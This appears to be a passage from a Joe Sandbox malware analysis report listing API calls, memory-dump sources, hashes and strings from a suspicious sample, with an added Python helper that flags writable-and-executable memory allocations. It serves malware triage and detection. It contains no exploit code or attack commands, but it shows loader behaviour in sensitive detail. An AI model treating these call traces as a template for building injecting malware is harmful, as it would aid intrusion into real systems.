• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4

Control-flow Graph (image not recovered; blocks and edges from the graph data): single block 41a50a-41a54d (call 41af30, NtAllocateVirtualMemory)
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
• Instruction ID: 3214efd615eb7748cce34c0857b00ece96d2b0a482458fe4319a666bc9c2efb0
• Opcode Fuzzy Hash: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
• Instruction Fuzzy Hash: CBF05EB6210104AFDB14CF88CC80EE77B69AF8C314F158549FE489B241C230E811CFA0

Control-flow Graph (image not recovered; blocks and edges from the graph data): 41a510-41a526 -> 41a52c-41a54d (NtAllocateVirtualMemory); 41a510-41a526 -> 41a527 (call 41af30) -> 41a52c-41a54d
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
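The argument lists in the NtAllocateVirtualMemory records above are the raw values the Joe Sandbox IDA plugin recovered at each call site ("?" marks a slot it could not resolve); the report does not state which position holds which parameter of the Nt prototype. The following Python is an added example, not part of this report or of Joe Sandbox's own tooling. It parses lines in the `Api.Module(args), ref: addr` form shown here and decodes the documented winnt.h constants they contain: 0x3000 is MEM_COMMIT|MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE, the combination that produces a region that is both writable and executable. Because the parameter mapping is not given, the decoder uses a heuristic that is an assumption of this example: it looks for an adjacent AllocationType/Protect pair in the order of the NtAllocateVirtualMemory prototype and reports the first such pair. The three sample lines are copied from the records on this page.

```python
import re
from typing import Dict, List, Optional, Tuple

# API lines copied from the report records on this page; the decoder around them
# is an added illustration, not Joe Sandbox's own code.
REPORT_API_LINES = [
    "NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,"
    "00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549",
    "NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,"
    "00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D",
    "NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485",
]

# Documented Windows constants from winnt.h.
MEM_FLAGS = {
    0x00001000: "MEM_COMMIT",
    0x00002000: "MEM_RESERVE",
    0x00080000: "MEM_RESET",
    0x00100000: "MEM_TOP_DOWN",
    0x00200000: "MEM_WRITE_WATCH",
    0x00400000: "MEM_PHYSICAL",
    0x20000000: "MEM_LARGE_PAGES",
}
MEM_MASK = 0
for _bit in MEM_FLAGS:
    MEM_MASK |= _bit
PAGE_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITABLE_AND_EXECUTABLE = {0x40, 0x80}

# "Api.Module(arg,arg,...), ref: ADDR" as printed in the APIs sections; "?" marks
# a stack slot the plugin could not resolve statically.
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


def parse_api_line(line: str) -> Dict:
    """Split one report API line into api, module, ref address and argument values."""
    m = LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not an API record line: {line!r}")
    args = [None if a == "?" else int(a, 16) for a in m.group("args").split(",") if a != ""]
    return {"api": m.group("api"), "module": m.group("module"),
            "ref": int(m.group("ref"), 16), "args": args}


def decode_alloc_type(value: Optional[int]) -> Optional[str]:
    """Name the MEM_* bits; None if the value is unknown or has bits outside the set."""
    if value is None or value == 0 or value & ~MEM_MASK:
        return None
    return "|".join(name for bit, name in MEM_FLAGS.items() if value & bit)


def decode_protect(value: Optional[int]) -> Optional[str]:
    """Name a PAGE_* value: exactly one base protection plus optional modifier bits."""
    if value is None or value & ~0x7FF or (value & 0xFF) not in PAGE_BASE:
        return None
    names = [PAGE_BASE[value & 0xFF]]
    names += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def find_alloc_protect(args: List[Optional[int]]) -> Optional[Tuple[int, str, str]]:
    """Heuristic (an assumption of this example): AllocationType and Protect sit next
    to each other in prototype order and AllocationType commits or reserves."""
    for i in range(len(args) - 1):
        alloc, prot = decode_alloc_type(args[i]), decode_protect(args[i + 1])
        if alloc and prot and args[i] & (0x1000 | 0x2000):
            return i, alloc, prot
    return None


def analyze_line(line: str) -> Dict:
    """Decode one line; only NtAllocateVirtualMemory records get flag decoding."""
    rec = parse_api_line(line)
    finding = {"api": rec["api"], "ref": rec["ref"], "arg_index": None,
               "alloc_type": None, "protect": None, "rwx": False}
    if rec["api"] == "NtAllocateVirtualMemory":
        hit = find_alloc_protect(rec["args"])
        if hit:
            i, alloc, prot = hit
            finding.update(arg_index=i, alloc_type=alloc, protect=prot,
                           rwx=(rec["args"][i + 1] & 0xFF) in WRITABLE_AND_EXECUTABLE)
    return finding


def scan_report(lines: List[str]) -> List[Dict]:
    return [analyze_line(line) for line in lines]


if __name__ == "__main__":
    for f in scan_report(REPORT_API_LINES):
        flag = "RWX allocation" if f["rwx"] else "-"
        print(f"{f['api']:<24} ref={f['ref']:08X} {f['alloc_type']} {f['protect']} {flag}")
```

Run over the three lines, only the NtAllocateVirtualMemory record is reported as an RWX allocation (pair found at argument index 8). The NtCreateFile and NtClose lines contain no value that decodes as a valid allocation-type/protection pair, which is what keeps the heuristic from firing on unrelated stack words such as return addresses or the FFFFFFFF pseudo-handle.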
APIs
• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
• Instruction ID: 5c9da78348f1c9ef571b357f18b9320631ab7668477cfade35412350ce0ea39f
• Opcode Fuzzy Hash: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
• Instruction Fuzzy Hash: A2E0C272200204BFD720EFA4CC45EDB7B68EF44364F104459F90EAB242C130E511CB90
APIs
• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d4da76cf9d892bea879f9f6f9a798bf319f2add36b99dd78171643a01150901a
• Instruction ID: 0a3a999c0ec8d306c2b0f083042b923fb4d545934adedd72f7b1732b0b91d56d
• Opcode Fuzzy Hash: d4da76cf9d892bea879f9f6f9a798bf319f2add36b99dd78171643a01150901a
• Instruction Fuzzy Hash: 93900225211400131605B5584704507004687D6391355C032F1019550DDA2589626125
APIs
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6b9560696ced4ec965a62be01503a61076cbb917b64907e369351a0b33eadf24
• Instruction ID: 7c14024ed2ef89a6c2741be04807717f535dfc4aa9325e3d1a49f954e4b7cb9e
• Opcode Fuzzy Hash: 6b9560696ced4ec965a62be01503a61076cbb917b64907e369351a0b33eadf24
• Instruction Fuzzy Hash: 3390023120140812E6807158840464A000587D2341F95C026A0029654ECE198B5A77A5
APIs
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
Strings
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: 6EA
• API String ID: 1279760036-1400015478

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 212 408310-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 212->221 222 40838e-408392 212->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 243 41a791-41a79d 244 41a7a0-41a7ba call 41af30 243->244 245 41a723-41a727 243->245 249 41a7bf-41a7d4 LookupPrivilegeValueW 244->249 246 41a72f-41a744 245->246 247 41a72a call 41af30 245->247 247->246
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 263 41a632-41a656 264 41a65c-41a671 RtlFreeHeap 263->264 265 41a657 call 41af30 263->265 265->264
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                      • Opcode ID: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                                                      • Instruction ID: ee930675011bf31697f300d8cbe35b02760f94f29c7344f56dc328e1a5823920
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F039B1221204ABD718EF58DC49EE777A9FF48750F118669FA485B242D631E811CBA0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 266 41a640-41a671 call 41af30 RtlFreeHeap
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                      • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                      • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                      • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                      • Opcode ID: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                                                      • Instruction ID: 05bc5eed07a0c19d6aa88ef3f94ab0c5740ad5768756de9c93d4a761ab8051c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEB09231A942182AEA74D6D89C06B2AB755DB85712F144296BD2CA67C0E4A22D2041EA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                                                                                                                                                      • Instruction ID: 9e29f36098e58cbab66a1734697e1c9bd8d2675e909f204fca5d924a9df53a8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2B09B71D015C5D5EF51F760460871B790067D1751F15C072D2034645F473CD5D1F275
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-2160512332
                                                                                                                                                                                                                      • Opcode ID: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                                                                                                                                                      • Instruction ID: 9e567d75716230914aae7c14a88539a6bf856803a1b605cab23a5a755382248a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B92AB71A04342AFD760DF24C982F6AB7E8FB84760F04482DFA94D7291D774E944EB92
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • undeleted critical section in freed memory, xrefs: 00FB542B
                                                                                                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54CE
                                                                                                                                                                                                                      • double initialized or corrupted critical section, xrefs: 00FB5508
                                                                                                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 00FB54B6
• Critical section address., xrefs: 00FB5502
• Thread is in a state in which it cannot own a critical section, xrefs: 00FB5543
• Thread identifier, xrefs: 00FB553A
• 8, xrefs: 00FB52E3
• Critical section address, xrefs: 00FB5425, 00FB54BC, 00FB5534
• corrupted critical section, xrefs: 00FB54C2
• Critical section debug info address, xrefs: 00FB541F, 00FB552E
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54E2
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB540A, 00FB5496, 00FB5519
• Address of the debug info found in the active list., xrefs: 00FB54AE, 00FB54FA
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
• Instruction ID: 59ac8b8a45c1e3c4c831c9a8f8a75194531404127740ae20c5f2da386e520040
• Opcode Fuzzy Hash: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
• Instruction Fuzzy Hash: CA81ABB1E41758AFEB20CF95D845BEEBBB5AB08B24F244019F508B7280C779AD41EB51
Strings
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FB2624
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FB24C0
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FB2506
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FB2412
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FB22E4
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FB2409
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FB25EB
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FB2498
• @, xrefs: 00FB259B
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FB2602
• RtlpResolveAssemblyStorageMapEntry, xrefs: 00FB261F
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
• Opcode ID: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
• Instruction ID: 20fd3bdd98dad365f58f7eb5b9cbc7da666b450ce35f9edc1e9d6968f7667fdf
• Opcode Fuzzy Hash: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
• Instruction Fuzzy Hash: 570260B2D002289BDB71DB14CC81BDDB7B8AB54314F0441EAE64DA7241DB35AF84EF5A
Strings
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
• Opcode ID: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
